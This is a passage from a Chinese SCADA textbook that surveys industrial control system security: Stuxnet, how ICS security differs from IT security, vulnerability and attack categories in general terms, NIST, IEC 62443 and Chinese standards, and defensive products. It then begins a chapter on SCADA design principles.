控制系统信息安全最严重的事件是2010年发生的针对伊朗布什尔核电站的“stuxnet”(震网)超级蠕虫病毒。该病毒入侵对象是西门子的PLC和安装有WinCC的系统,主要目的是窃取系统控制权限,从而更改控制参数。这次入侵导致大量的离心机报废,严重阻碍了伊朗核计划的顺利进行。震网病毒被认为是第一个对针对工业控制系统的恶意病毒,因而它开启了真正意义上的信息战,国外有学者也称其为网络战争。 7.3.3 工业控制系统信息安全与IT系统信息安全的比较 工业控制系统的信息安全属新鲜事物,研究时间短,因此,在工控系统信息安全的分析、评估、测试和防护上,一个自然的想法就是借鉴传统IT系统信息安全的既有成果,毕竟,工业控制系统也是现代信息技术和控制技术的结合。然而,工业控制系统又不是一般的信息系统,要想采用传统的IT信息安全技术,首先要分清现代工业控制系统信息安全与传统IT信息安全的异同,在此基础上,才能有针对性地利用传统IT信息安全技术来解决工控信息安全的问题。 工控信息安全与传统信息安全相比,主要的不同点表现在以下几个方面: (1)信息安全属性不同。工业控制系统以“可用性”为第一安全需求,而IT信息系统以“机密性”为第一安全需求,如图7.18所示。在信息安全的3个属性(机密性、完整性、可用性)中,IT信息系统的优先顺序是机密性、完整性、可用性,更加强调信息数据传输与存储的机密性和完整性,能够容忍一定延迟,对业务连续性要求不高;而工业控制系统则是可用性、完整性、机密性。工控系统之所以强调可用性,主要是由于工控系统属于实时控制系统,对于信息的可用性有很高的要求,否则影响控制系统的性能。特别是早期的工控系统都是封闭性系统,信息安全问题不突出。此外,由于工控设备,特别是现场级的控制器,多是嵌入式系统,软、硬件资源有限,无法支撑复杂的加密等信息安全应用功能。 (2)系统特征不同。工业控制系统不是一般的信息系统,现代的工业控制系统广泛用于电力、石油、化工、冶金、交通控制等许多重要领域。控制系统与物理过程结合紧密,已经成为一个复杂的信息物理系统(CPS)。而传统的IT系统与物理过程基本没有关联。因此,当工控系统受攻击后,可能会导致有毒原料泄露发生环境污染或区域范围内大规模停电等影响社会环境、人民生命财产安全的恶劣后果;而信息系统遭受攻击后可能造成服务中断、重要数据泄露或被破坏。 图7.18 IT系统与控制系统安全顺序要求 (3)系统用途不同。工业控制系统是工业领域的生产运行系统,而IT系统通常是信息化领域的管理运行系统。 (4)生命周期不同。工业控制系统生命周期长,通常至少要达到10~15年,而一般的IT系统生命周期在3~5年。 (5)运行模式不同。对于多数工业控制系统,除了定期的检修外,系统必须长期连续运行,任何非正常停车都会造成一定的损失。而IT系统通常与物理过程没有紧密联系,允许计划内的短时间的停机或非计划的停机或系统重新启动。 (6)升级维护不同。工业控制系统不能接受频繁的升级更新操作,而IT系统通常能够接受频繁的升级更新操作。由于该原因,工控系统无法像IT系统一样,通过不断给系统安装补丁,不断升级反病毒软件等典型的信息安全防护技术来面对新的安全威胁,不断提高系统的信息安全水平。 (7)通信协议不同。工业控制系统基于工业控制协议(例如 Modbus、DNP3、现场总线协议),而IT信息系统基于IT通信协议(例如HTTP、FTP、SMTP、TELNET)。虽然,现在主流工业控制系统已经广泛采用工业以太技术,基于IP/TCP/UDP通信,但是应用层协议仍然是不同的。 (8)通信网络的性能指标不同。工业控制系统对报文时延很敏感,而IT信息系统通常强调高吞吐量。在网络报文处理的性能指标(吞吐量、并发连接数、连接速率、时延)中,IT信息系统强调吞吐量、并发连接数、连接速率,对时延要求不太高(通常为几百微秒);而工业控制系统对时延要求高,某些应用场景要求时延在几十微秒内,对吞吐量、并发连接数、连接速率往往要求不高。 (9)工作环境不同。工业控制系统通常工作在环境比较恶劣的现场(如高低温、潮湿、振动、粉尘、盐雾、电磁干扰),特别是各种现场仪表、远程终端单元等现场控制器;而IT信息系统通常在恒温、恒湿的机房中。基于此,一些传统的IT信息安全产品无法直接用于工业现场,必须按照工业现场环境的要求设计专门的工控信息安全防护产品。 7.3.4 工业控制系统体系结构及其脆弱性分析 1. 工业控制系统体系结构与安全分析 根据企业控制系统集成标准IEC62264(GB/T20720),可将工业控制系统分为5层,分别为过程设备层、本地或基本控制层、监测控制层、运行管理层以及企业信息层,如图7.19所示。 图7.19 工业控制系统分层模型 第4层—企业系统层。企业信息层是系统的组织管理机构,实现企业人、财、物的统一协调、管理和优化。在该层使用的大都是传统的IT技术、设备等,企业级的大量应用要求与互联网连接,虽然目前企业普遍采取了一定的边界防护措施,但该层仍然是外部入侵进入工控系统的重要通道。 第3层—运行管理层。运行管理层的主要功能是对生产中工作流程进行管理与控制,它包括系统运行、系统管理、质量管理、生产调度以及可靠性保障等。运行管理层处理控制层与企业系统层之间,通常在两者之间进行边界隔离。 第2层—监测控制层。监测控制层的主要功能是实现对生产过程的中央监控和管理功能。监测层属于第1层的集中管理层,与第1层关系紧密,两者之间通常不进行隔离。 第1层—本地或基本控制层。本地或基本控制层的主要功能是对物理过程进行操作和控制,主控设备是各种类型的控制器。配置安全仪表的系统还可以实现一定的功能安全保护功能。从工业控制系统的功能看,该层是整个工业控制系统体系中最为关键的一层。该层的工作状态直接影响到过程层的运行状态。从信息安全角度看,即使上层受到攻击而瘫痪,如果该层能免于各种形式的攻击,则工业控制系统的基本功能仍然正常,受其控制的第0层处于受控状态。因此,该层是工业控制系统信息安全检测与防护的重点。 第0层—过程层。过程层指的是现场的各类物理设备和生产工艺过程。在这一层中包括各种不同类型的生产设备。例如电力行业的发电、输电、配电设备,化工生产中的反应器、精馏塔、压缩机等,轨道交通中的机车,冶金生产中的高炉等。过程层设备的运行状态直接关系到相关物理过程的安全,因此,必须确保这些设备处于安全状态。然而,由于这些设备本身采取的安全保护措施十分有限,其安全性很大程度上取决于对这些设备实现控制与保护的第1层。除了物理手段破坏第0层外,通过攻击工业控制系统来间接破坏第0层是工业控制系统信息安全风险的主要来源。第0层与第1、2、3、4层信息空间的融合才产生了工业控制系统信息安全的迫切需求。实际上,对工业控制系统实施攻击的目的并非是控制器、服务器或执行器等测控装置,而是经由这些装置,对第0层的物理设备造成破坏,从而造成最大程度的破坏作用,达到其攻击目的。例如,伊朗核电站遭受“震网”病毒攻击,最终造成进行铀浓缩的离心机损坏,而这种损坏是经由上层入侵达到第1层,再通过操纵第1层的控制器来改变对离心机实施控制的变频器频率,从而破坏第0层的离心机。 2. 工业控制系统的脆弱性分析 工业控制系统之所以存在信息安全的问题,实质是由于工业控制系统存在脆弱性,或存在漏洞,而这些漏洞存在被攻击者利用的可能性,从而对工控系统及其被控的物理过程造成威胁。 对于典型的工业控制系统,可从以下几个角度分析其脆弱性。 1)体系架构的脆弱性 现代工业控制系统的架构不断演变,已经逐步成熟,其稳定性和可靠性已经得到验证,从而被推广并得到广泛使用。这种架构的典型特征表现在开放性和分层结构。开放性导致IT系统漏洞被引入。而采用分层结构时却忽略了对层之间信息流动的监控和保护,从而造成可以通过上层系统逐步入侵下层系统。 2)安全策略的脆弱性 工业控制系统缺乏明确的安全认证,缺乏系统的安全策略。由于工业生产的特殊性,工业控制系统中很少或不使用补丁策略,较少对杀毒软件进行周期性更新。即使使用补丁策略,也只是针对上位机系统。由于控制器的封闭特性,用户很难对控制器固件进行升级。有些厂家甚至根本不支持对控制器固件进行升级。 3)软件脆弱性 工业控制系统功能的实现越来越依赖系统软件和应用软件。由于对于嵌入式软件测试的困难,各种软件漏洞的存在留下了安全隐患。此外,由于工控系统各种操作系统漏洞曾在且较难升级,也造成了安全隐患。目前典型的软件漏洞有缓冲区溢出、SOL注入、格式化字符串等。 4)通信协议脆弱性 大部分广泛使用的工业控制系统通信协议,例如Modbus、DNP、IEC60870-5-101协议是在很多年前设计的,基于串行连接进行网络访问。当以太网连接成为广泛使用的本地网络的物理连接层时,工业控制系统可以基于IP协议之上实现。工业控制系统协议缺乏保密和验证机制,特别缺乏验证一个主站和从站之间发送的消息的完整性(如果原始信息内容已被攻击者修改,是很难被发现的)技术。此外,工业控制系统协议也不包括任何不可抵赖性和防重放机制。攻击者可以利用工业控制系统的这些安全限制,发动拒绝服务攻击、中间人攻击、重放攻击、欺骗攻击等。 5)策略和过程脆弱性 工业控制系统使用过程中一些不完整、不正确的信息安全策略,不适当的配置或缺少特别适用的安全策略通常导致工业控制系统的脆弱性。缺乏信息安全机制实施方面的管理机制、审计机制,以及不间断操作或灾难恢复机制。对硬件、软件、整机和技术规范的修改过程缺乏严格控制与管理,可能导致工业控制系统受到不恰当、不正确的配置修改。 6)工业控制系统网络脆弱性 工业控制系统网络和与之相连的其他网络的缺陷、错误配置或不完善的网络管理过程可能导致工业控制系统的脆弱性。 3. 针对工业控制系统典型的攻击手段 针对工业控制系统的攻击主要有以下几种: (1)拒绝服务攻击。例如攻击包括模拟主站,向RTU发送无意义的信息,消耗控制网络的处理器资源和带宽资源。 (2)中间人攻击。缺乏完整性检查的漏洞使攻击者可以访问到生产网络,修改合法消息或制造假消息,并将它们发送到主站。 (3)重放攻击。安全机制的缺乏,使攻击者重复发送合法的工业控制系统消息,并将它们发送到从站设备,从而造成设备损毁、过程关闭等破坏。 (4)欺骗攻击。向控制中心操作人员发送虚假的、欺骗信息,导致操作中心不能正确了解生产控制现场的实际工况,诱使其执行错误操作。 (5)修改控制系统装置或设备的软件,导致发生不可预见的后果。 以一个大型的SCADA系统为例来分析各种攻击手段,如图7.20所示,这里不考虑来自公司层网络的攻击,因为管理层网络/系统只是实施攻击可能的一个通道,攻击最终还是要针对控制系统。攻击A0是针对现场物理设备实施的攻击,此类攻击需要攻击者能够接触到设备才能实施破坏,难度较大,故攻击者更倾向于实施A1到A6这几种攻击(这里不考虑此类物理攻击)。攻击A1和A2将对工业网络产生影响,攻击A1可能在控制系统局域网与过程设备之间造成拒绝服务攻击,或者对传感器实施欺骗攻击。A2也将形成类似的拒绝服务攻击或欺骗攻击,以及造成PLC内部的通信障碍。A3对控制网络进行的攻击将引起监控系统与控制系统之间的通信障碍,从而隐藏控制系统出现的异常。A4和A5是对于状态监控系统的攻击,通过篡改状态观测数据来隐藏异常,或修改设定值、控制器参数等方法对工业控制系统造成破坏。最后,A6为直接控制上位机,那么无论现场发生任何异常,上位机都无法对其进行操作,攻击者可以对工业控制系统进行任意破坏。 图7.20 过程控制系统结构图 7.4 工业控制系统信息安全标准 7.4.1 国际标准和指南 1999年公安部提出并组织制定了强制性国家标准《计算机信息安全保护等级划分准则》。该标准是传统计算机信息系统领域安全保护基础性标准之一,提出了分级防护的思想。将计算机信息系统安全由低到高分为5级:用户自主保护级、系统审核保护级、安全标记保护级、结构化保护级和访问验证保护级。分级防护的思想不仅为计算机信息系统安全法规的制定和执法部门的监督检查提供依据,也为安全产品的研制提供技术支持。《计算机信息安全保护等级划分准则》的发布极大地促进了我国信息安全领域的建设和发展,也为工业控制系统信息安全防护提供了较高的参考价值。 国际上,一些标准研究机构如美国国家标准和技术研究院(NIST)、国际电工委员会(IEC)等已经针对工业控制系统的信息安全标准化开展了一系列研究。例如NIST已经制定了SP800-53、82系列标准,IEC已经制定了62443系列标准等。 NIST机构制定的SP800-53标准是NIST在实施FISMA法案时制定的针对信息安全控制措施的重要安全标准和指南之一。该标准已经在美国联邦的内部职能机构(如国防部)、服务提供商和一些私营企业中得到推广。同时,SP800-53标准也是风险评估和安全控制措施评估领域内基础性标准。SP800-53主要内容可分为管理类、操作类和技术类三大类规约共205条安全控制措施,分别介绍了信息系统安全和风险管理、人员管理、系统软硬件安装与部署的技术控制措施。但SP800-53标准对工业控制系统的信息安全控制以及风险评估考虑不足,尽管该标准在附录中对工业控制系统的安全控制问题做了一些探讨,但并未进行详细研究。工业控制系统虽然越来越多地加入了一些信息系统的软硬件,但将NIST SP800-53为基准对工业控制系统实施安全控制和风险评估还非常困难。2008年,NIST起草完成并发布了《工业控制系统安全指南(Guide to Industry Control Systems Security)》,又称为SP800-82。该指南致力于为工业控制系统的安全保障提供指导意见。SP800-82详细介绍了工业常见的多种类型控制系统,包括监控和数据采集(SCADA)系统、分布式控制系统(DCS)以及可编逻辑控制系统(PLC)、远程终端控制单元(RTU)等控制单元。这些系统往往是互相依存成为一个整体,是构成国家关键基础设施运行的关键。该指南还详细分析了工业控制系统与IT系统的区别、确定了上述系统的典型威胁和脆弱性,并提供了相关资产的安全防护对策。SP800-82的适用范围非常广泛,包括电力、污水处理、石油化工、天然气、核电、交通、市政等国家关键基础行业的工业控制系统。 国际电工委员会(IEC)和国际自动化协会ISA 99于2007年共同制定了《工业通信网络—网络与系统安全》系列标准,即IEC 62443系列标准,该标准主要内容包括工业自动化控制系统(IACS)的安全保障措施、安全规程的建立和运行,以及对IACS的安全技术要求,明确了安全技术及应用方法。2011年该标准名称改为“工业过程测量、控制和自动化网络与系统信息安全”。IEC62443系列标准从使用对象的角度分为4个系列共12个二级标准。IEC 62443系列标准结构如图7.21所示,4个系列分别是“通用系列”、“用户业主系列”、“系统集成商系列”和“部件制造商系列”标准。 图7.21 IEC 62443 系列标准结构示意图 (1)第1个系列是通用系列,其针对的是安全的通用方面,它是IEC 62443系列标准的基础,该系列对安全的术语、模型等通用方面进行了概述性的描述。 · IEC 62443-1-1 术语、概念和模型:为其余各部分标准定义了基本的概念和模型,从而更好地理解工业控制系统的信息安全。 · IEC 62443-1-2 术语和缩略语:包含了该系列标准中用到的全部术语和缩略语列表。 · IEC 62443-1-3 系统信息安全符合性度量:包含建立定量系统信息安全符合性度量体系所必要的要求,提供系统目标、系统设计和最终达到的信息安全保障等级。 (2)第2个系列的使用对象是运用工业控制系统的组织,其主要针对组织信息安全程序建立,包括组织在建立程序时应当考虑的信息安全系统管理、人员和程序设计等方面的要求。 · IEC 62443-2-1 建立工业自动化和控制系统信息安全程序:描述了建立网络信息安全管理系统所要求的元素和工作流程,以及针对如何实现各元素要求的指南。 · IEC 62443-2-2 运行工业自动化和控制系统信息安全程序:描述了在项目已设计完成并实施后如何运行信息安全程序,包括量测项目有效性的度量体系的定义和应用。 · IEC 62443-2-3 工业自动化和控制系统环境中的补丁更新管理 · IEC 62443-2-4 对工业自动化控制系统制造商信息安全政策与实践的认证。 (3)第3系列的使用对象是工业控制系统系统软硬件集成商,其主要针对系统集成商保护系统所需的技术性信息安全要求,包括整体IACS分区域和分通道的方法,以及对IACS的信息安全保障等级进行定义并提出了要求。 · IEC 62443-3-1 信息安全技术:提供了对当前不同网络信息安全工具的评估、缓解措施,可有效地应用于基于现代电子的控制系统,以及用来调节和监控众多产业和关键基础设施的技术。 · IEC 62443-3-2 区域和通道的信息安全保障等级:描述了定义所考虑系统的区域和通道的要求,用于工业自动化和控制系统的目标信息安全保障等级要求,并对验证这些要求提供信息性的导则。 · IEC 62443-3-3 系统信息安全要求和信息安全保障等级:描述了与IEC 62443-1-1 定义的7 项基本要求相关的系统信息安全要求,及如何分配系统信息安全保障等级。 (4)第4系列的使用对象是工业控制系统的部件制造商。其主要针对部件制造商提供的设备部件是否从技术特点上满足了信息安全要求,设备部件包括硬件、软件和信息集成部分。 · IEC 62443-4-1 产品开发要求:定义了产品开发的特定信息安全要求。 · IEC 62443-4-2 对IACS 产品的信息安全技术要求:描述了对嵌入式设备、主机设备、网络设备等产品的技术要求。 IEC 62443已发布的部分主要分析了工业控制系统威胁、安全概念、纵深防御、风险评估、用例、工业控制系统物理架构、安全需求、安全生命周期等内容,并提出了工业控制系统安全评估等级 SAL 的概念。其中指出工业控制系统安全需要关注的焦点在于“人-过程-技术”这一三联原则。三联原则与安全需求的关系如图7.22所示。过程的鲁棒性可以克服技术漏洞潜在的危害;由人员因素而导致的脆弱性也会降低技术的有效性。此外,该标准指出了7个安全基本需求,包括认证与授权控制、使用控制、系统完整性、数据机密性、数据限制、事件实时响应、资源可用性等。 图7.22 IEC 62443标准的ICS安全三联原则与基本需求的关系 7.4.2 我国国家和行业标准 1. 国家标准 我国在2011年发布实施了GB/T 26333-2010《工业控制网络安全风险评估规范》。这是我国工控安全第一个国家标准,解决了我国工控安全标准空白的问题,实现了工控安全标准零的突破。然而,由于该标准缺乏核心内容,比较简单,可操作性低,因此其接受程度较低。 2014年我国又发布了GB/T 30976.1-2014《工业控制系统信息安全第1部分:评估规范》和GB/T 30976.2-2014《工业控制系统信息安全第2部分:验收规范》。前一个标准分为管理评估和系统能力(技术)评估。管理评估宜对照风险接受准则和组织机构相关目标,识别、量化并区分风险的优先次序。风险评估的结果宜指导并确定适当的管理措施及其优先级,评估风险和选择控制措施的过程需要执行多次,以覆盖组织机构的不同部门或各个工业控制系统。管理评估分3个级别、系统能力(技术)评估分为4个级别。信息安全等级由系统能力等级和管理等级二维确定。验收规范为工业控制系统用户进行工控信息安全项目验收提供了标准。 2. 行业标准 电力行业在工控信息安全上走在了大多数行业之前。2005电监会5号令《电力二次系统安全防护规定》确定的“安全分区、网络专用、横向隔离、纵向认证”十六字方针对于确保电力系统信息安全起了重要作用,对提供其他行业制定行业标准也有较大的促进和参考作用。2014年9月1日废除该规范,同时颁布了《电力监控系统安全防护规定》(发改委14号令)。 石化行业2010年发布了GB/T50609-2010 《石油化工工厂信息系统设计规范》。此设计规范中要求网络之间需要采用安全隔离。核电行业2008发布了GB/T13284.1-2008 《核电厂安全系统第1部分设计准则》和GB/T13629-2008 《核电厂安全系统中数字计算机的适用准则》。 7.5 工业控制系统安全防护 7.5.1 工业控制系统信息防护措施 1. 工业控制信息安全防护手段 目前,工业控制领域中比较典型的防护手段有: (1)防火墙:防火墙是一种访问控制类产品,它将内部网络与存在威胁的外部网络隔离开来,用来防止内部对外部的不安全访问,以及阻止外部网络对内部资源的非法访问。随着工业控制界安全意识的增强,防火墙在工业控制领域的应用也越来越多。防火墙主要包括过滤技术,代理服务技术,应用网关技术等。总体来说,防火墙能够较为有效地防止不法分子利用安全漏洞来对内部网络进行攻击,并且能够对数据流进行实时监控、记录和报告,且不影响内部网络与外部网络、控制网络与厂级网络之间的连接。 (2)安全路由器:处于对安全性的要求,企业对于信息系统的连接从过去的只要求连接,到现在寻求整合安全特性的连接,致使安全路由器快速发展,加入了防火墙技术、加密虚拟专用网、宽带管理和访问控制列表等安全技术特性的新型路由器应运而生。 (3)虚拟专用网:虚拟专用网(Virtual Private Network,VPN)是在公共网络上建立专用的网络,没有采用传统网络的物理链路,通过数据加密和访问控制等技术,来实现两个或多个内部网之间的互联。 (4)安全服务器:安全服务器的主要功能是对局域网内部信息之间存储、传输进行安全保护,主要功能包括对局域网资源进行管理和控制,对局域网内用户,以及所有信息安全相关的事件进行审计和跟踪。 (5)安全管理中心:安全管理中心的主要功能是对工业控制系统中各类网络、安全产品进行统一管理,并给各安全设备分发密钥,监控各安全产品运行状态,进行数据收集、分析、响应安全事件等。 (6)入侵检测系统(Intrusion Detection Systems,IDS):入侵检测系统是除了防火墙,加密处理等之后的新一代信息安全防护技术。通过对网络和日志审计数据中的攻击行为进行策略反应,判断是否存在可疑行为,及时阻隔入侵,保障系统安全,被认为是继防火墙之后的系统第二道安全“防线”。入侵检测系统具有6个特性: ① 监视、分析系统状态。 ② 系统正常和异常行为的审计。 ③ 识别系统的可疑行为并发出警告处理。 ④ 能够对异常行为进行分析、侦别。 ⑤ 评估系统数据文件的一致性和完整性。 ⑥ 进行审计跟踪管理。 (7)安全操作系统:安全操作系统指为系统提供安全运行平台,在系统自主访问、标记、身份识别等多方面进行安全保护,构成安全的网络服务,其自身具有安全特性和安全保障能力,比普通的操作系统提供更多的保护和隔离。 2. 工业控制系统入侵检测技术 以IDS为代表的入侵检测技术和以防火墙为代表的访问控制技术从根本上来说是两种不同的技术行为。入侵检测作为一种主动的安全防御措施,能够主动、实时地检测攻击,通常要求IDS具有较低的漏报率和误报率;而防火墙最主要的特征应当是通(传输)和断(阻隔)两个功能,所以其传输要求较高。由于防火墙本身可能存在安全问题,需要不断地对防火墙进行升级,以更好地适应控制系统的信息安全需求。由于IDS在工控信息安全防护上的重要作用,IDS技术越来越受到重视。 根据数据来源不同,IDS可以分为: (1)基于主机的入侵检测系统(Host-based Intrusion Detection System,HIDS)。其数据来源于本系统的审计日志,或者监控系统采集的数据信息。通过分析日志和数据信息检测入侵行为。HIDS具有性价比高,无需添加独立的设备,可裁剪的优点。但是基于主机的入侵检测具有移植性差,只能检测本系统无法监控相关网络的局限,并且为所有的系统部署配置日志审计及相应的检测系统成本较大。 (2)基于网络的入侵检测系统(Network-based Intrusion Detection System,NIDS)。其数据来源于网络上提取的数据流,通过监听网段的数据检测入侵行为。NIDS具有隐蔽性好,成本低,实时检测的优点,能够检测到未成功的攻击意图,可以检测出基于主机的检测系统无法检测的网络攻击。 (3)混合型的入侵检测系统。综合上述两种系统的优势,既能分析系统的审计信息,又可以通过网络监听数据流,实现了NIDS和HIDS的互补。 根据技术方法不同可分为: (1)基于特征的入侵检测(signature-based detection)。该检测方法又称为误用检测(misuse detection)。该方法需要对异常行为进行建模,得到反映异常行为特征的数据库。通过检测系统采集的数据源是否匹配数据库的攻击特征来判断是否发生入侵行为。该方法可以有效地检测已知的攻击类型。是由于恶意攻击行为的多样性,对未知攻击的检测能力十分有限,需要不断地更新数据特征库,成本较高。 (2)异常检测(anomaly detection)。异常检测根据用户的正常行为进行建模,通过建好的模型,比较当前用户的行为是否偏离了正常的行为描述来判断入侵行为的发生,异常检测不需要恶意攻击的先验知识,可以有效地检测未知的入侵。异常检测通常采用统计方法,而统计方法中的阈值难以有效确定,太小的值会产生导致误报率提高,太大的值又会导致漏报率提高。此外,该方法无法对攻击行为进行精确识别和分类。 7.5.2 工业控制系统信息安全防护典型解决方案 1. Tofino工控安全解决方案 1)主动隔离解决方案 主动隔离解决方案的设计思想来源于IEC62443标准中定义的“区域”和“管道”的概念,即将相同安全要求和功能的设备放在同一区域内,区域间通信靠专有管道执行,通过对管道的管理来阻挡非法通信,保护网络区域及其中的设备。其典型代表是加拿大Byres Security公司推出的Tofino控制系统信息安全解决方案。Tofino解决方案由硬件隔离模块、功能软插件和中央管理平台组成,整体系统架构如图7.23所示。 硬件隔离模块应用于受保护区域或设备的边界;功能软插件对经过硬件模块的通信进行合法性过滤;中央管理平台实现对安全模块的配置和组态,并提供报警的显示、存储和分析。该方案最大的特点是基于白名单原理,能够深入到协议和控制器模型的层次对网络进行交通管制。此外,非IP的管理模式使安全设备本身不易被攻击,同时其报警平台让管理者对控制网络的信息安全状况有直观的了解。由于工控系统应用环境的特殊性,该方案对安全组件的可靠性要求比较高。 由于所有的网络威胁最后都是经由通信来实现的,而工业控制系统的物理结构和通信模式都相对固定,所以主动隔离是一种比较有效的解决方案,可以根据实际情况对控制系统进行信息安全防护。应用这种方案时应先根据防护等级和安全区域进行划分,寻求一个防护深度和成本的折中。 图7.23 Tofino控制系统信息安全解决方案 2)被动检测解决方案 被动检测解决方案延续了IT系统的网络安全防护策略。由于IT系统具有结构、程序、通信多变的特点,所以除了身份认证、数据加密等技术以外,还需要采用病毒查杀、入侵检测等方式确定非法身份,通过多层次的部署来加强信息安全防护。被动检测的典型代表是Industrial Defender公司的控制系统信息安全解决方案Industrial Defender,主要针对安全要求较高的电力行业推出的,包括统一威胁管理(UTM)、网络入侵检测、主机入侵防护、访问管理和安全事件管理等部分,如图7.24所示。 图7.24 Industrial Defender控制系统信息安全解决方案 其中,统一威胁管理为安全防御的第一道防线,集成了防火墙、入侵防御、远程访问身份验证和虚拟专用网络(VPN)技术。主机入侵防护将自动拦截所有未经授权的应用程序,网络入侵检测被动检测控制网络安全边界内所有的网络流量,能够检测到来自内部或外部的可疑活动。访问管理和IP网关保证了授权的远程访问和设备子站的安全接入;安全事件管理对网络中的安全事件进行集中监视和管理。该方案中的主机入侵防护系统基于白名单技术,确保得到授权的应用程序才能在工作站和客户端上运行,与耗费资源的黑名单技术相比,这是一个适用于工控环境的重要优点;网络入侵检测系统也集成了对某些工控协议的监视功能。该方案的缺点是部署和应用比较复杂。 被动检测解决方案的主要硬件设备均部署于原有系统之外,且主机入侵防护功能通过代理终端以白名单技术实现,这些措施对原有系统性能的影响较小,满足了工业控制系统可用性的要求。然而,由于网络威胁数据库的更新总存在滞后,所以基于黑名单技术的安全组件对于新出现的入侵行为无法做出及时的响应。一些新型的病毒或黑客攻击仍可能对工业控制系统造成危害。相比较而言,主动隔离方案主要对网络交通进行管理,而被动检测方案更侧重于对应用程序的监控,二者都可以达到一定的安全防御效果。 2. 施耐德安全一体化解决方案 施耐德是自动化领域著名的跨国公司,经过不断的收购扩张,其产品跨越了流程自动化、制造业自动化和电力自动化等行业领域。其主要产品包括PLC、PAC、Foxboro 集散控制系统、Triconex安全系统、Intouch组态软件等SCADA软件和实时数据库。为了提高工控信息安全水平,施耐德提出了其“自下而上”的三纵防护体系,其中设备级防护是核心,如图7.25所示。 图7.25 施耐德三纵防护体系安全解决方案 1)一级:设备级解决方案 其目的是提升每个单体设备的信息安全能力。这些设备包括:DCS硬件、SIS硬件、PLC硬件、RTU硬件、以太网交换机、工程师站、操作站、SCADA软件包、操作系统、现场仪表、执行机构等。 例如,对于其ePAC控制设备,其采取了如下的安全加固措施以提升其安全性能,使产品符合 IEC62443 / ISA99标准,并通过了Achilles Level 2 认证: · 安全可靠的先进设计。 · 冗余控制器、网络。 · 先进的处理器与原生的安全PAC特性。 · 固件、软件和用户数据的全方位保护。 · 控制器硬件和编程软件全面安全策略。 2)二级:系统级解决方案 即在控制系统架构设计上增强控制系统的信息安全功能,并采取一系列安全防护策略,包括:安全计划、网络分隔、边界保护、网段分离、安全设置、主动防御、被动防御等。 具体的一些措施如下: (1)边界防护:包括采取自学习工业协议分析和入侵检测,设置分层的南北防火墙和缓冲区,对子网划分和横向隔离。 (2)安全域服务器:安装反工业病毒系统并采取集中式安全策略控制。 (3)监控预警:包括网络和设备监控预警以及安全和设备管理。 (4)故障恢复:包括批量快速备份还原系统。 (5)安全更新:提供便捷的安全补丁和病毒库更新。 3)三级:管理级解决方案 (1)监控解决方案: · 完善管理制度。 · 建立完善的IDS/IPS体系。 · 建立完善的资产管理系统。 · 建立和完善监控和日志体系。 · 安全策略管理和执行功能。 (2)防护解决方案: · 文件完整性。 · 建立完善的数据备份和灾难恢复。 · 完善软件更新体系。 · 执行管理主机的应策略。 · 应用白名单。 第8章 SCADA系统设计与开发 8.1 SCADA系统设计概述 SCADA系统的设计与开发不仅首先要了解相应的国家和行业标准,还要掌握一定的生产工艺方面的知识,充分掌握自动检测技术、控制理论、网络与通信技术、计算机编程等方面的技术知识。在系统设计时要充分考虑SCADA系统的发展趋势;在系统开发过程中,始终要和用户进行密切沟通,了解它们的真实需求和企业操作、管理人员的专业水平。 本书前7章介绍的内容是SCADA系统开发中的一些关键技术,熟练掌握这些技术对于系统设计与开发是大有裨益的。当然,这些内容还很基础,要真正设计开发出先进可靠的SCADA系统,更多的还是依靠工程实践。通过实践,不断地总结与摸索,系统设计与开发的水平才会上一个新的台阶。 在国内,SCADA系统设计与开发有不同的模式,对于一些小的系统,用户会委托工程公司或其他的自动化公司进行设计与开发;而对于大型的系统,特别是政府投资的项目,要进行公开招标,由中标者进行系统开发;还有一种情况,用户会对要开发的SCADA系统提出总体的功能要求、技术要求和验收条件,然后进行招标。应标者要提出详细的系统设计方案,最后由评标专家决定最终中标者,由中标者根据投标技术方案进行系统的开发和调试。 在介绍有关SCADA系统设计与开发前,有必要阐述SCADA系统生命周期的问题。任何一个系统的设计与开发基本上是由6个阶段组成,即可行性研究、初步设计、详细设计、系统实施、系统测试和系统运行维护。通常这6个步骤并不是完全按照直线顺序进行的,在任意一个环节出现了问题或发现不足后,都要返回到前面的阶段进行补偿、修改和完善。 由于SCADA系统规模不同,其设计与开发所包含的工作量有较大的不同,但总体的设计原则和系统开发步骤相差不大。本章主要介绍SCADA系统的设计原则、系统开发、调试等。所介绍的内容对于其他计算机控制系统的开发也有一定的参考意义。 8.2 SCADA系统设计原则 控制技术的发展使得对于任何一个工业、公用事业、环境等行业的SCADA系统都可以有多个不同的解决方案,而且这些方案各有特点,很难说哪个更好。为此,在设计时,必须考虑如下原则与要求,选取一个综合指标好的方案。当然,不同时期、不同用户对这些指标的认同程度可能是不一样的,甚至用户会根据其特殊需求提出一些其他方面的性能指标,这些因素都会影响到最终的系统设计。一般而言,以下几点是SCADA系统设计时要参考的主要指标。 1.可靠性 SCADA系统,特别是下位机工作环境比较恶劣,存在着各种干扰,而且它所担当的控制任务对运行要求很高,不允许它发生异常现象,因此在系统设计时必须立足于系统长期、可靠和稳定的运行。因为一旦控制系统出现故障,轻者影响生产,重者造成事故,甚至人员伤亡。因此,在系统设计过程中,要把系统的可靠性放在首位,以确保系统安全、可靠和稳定地运行。 系统的可靠性是指系统在规定的条件下和规定的时间内完成规定功能的能力。在SCADA系统中,可靠性指标一般用系统的平均无故障时间MTBF和平均维修时间MTTR来表示。MTBF反映了系统可靠工作的能力,MTTR表示系统出现故障后立即恢复工作的能力。一般希望MTBF要大于某个规定值,而MTTR值越小越好。 为提高系统可靠性,需要从硬件、软件等方面着手。首先要选用高性能的上、下位机和通信设备,保证在恶劣的工业环境下仍能正常运行。其次是设计可靠的控制方案,并具有各种安全保护措施,比如报警、事故预测、事故处理等。 对于特别重要的监控过程或控制回路,可以进行冗余设计。对于一般的控制回路选用手动操作为后备;对于重要的控制回路,选用常规控制仪表作为后备。对于监控主机,可以进行冷备份或热备份,这样,一旦一台主机出现故障,后备主机可以立即投入运行,确保系统安全。当然,冗余是多层次的,包括I/O设备、电源、通信网络和主机等。冗余设计多可以提高可靠性,但系统成本也会显著增加。 2.先进性 在满足可靠性的情况下,要设计出技术先进的SCADA系统。先进的SCADA系统不仅具有很高的性能,满足生产过程所提出的各种要求和性能指标,而且对于生产过程的优化运行和实施其他综合自动化措施都是有好处的。先进的SCADA系统通常都符合许多新的行业标准,采用了许多先进的设计理念与先进设备,因此可以确保系统在较长时间内稳定可靠工作。当然,也不能片面追求系统的先进性而忽视系统开发、应用及维护的成本和实现上的复杂性与技术风险。 3.实时性 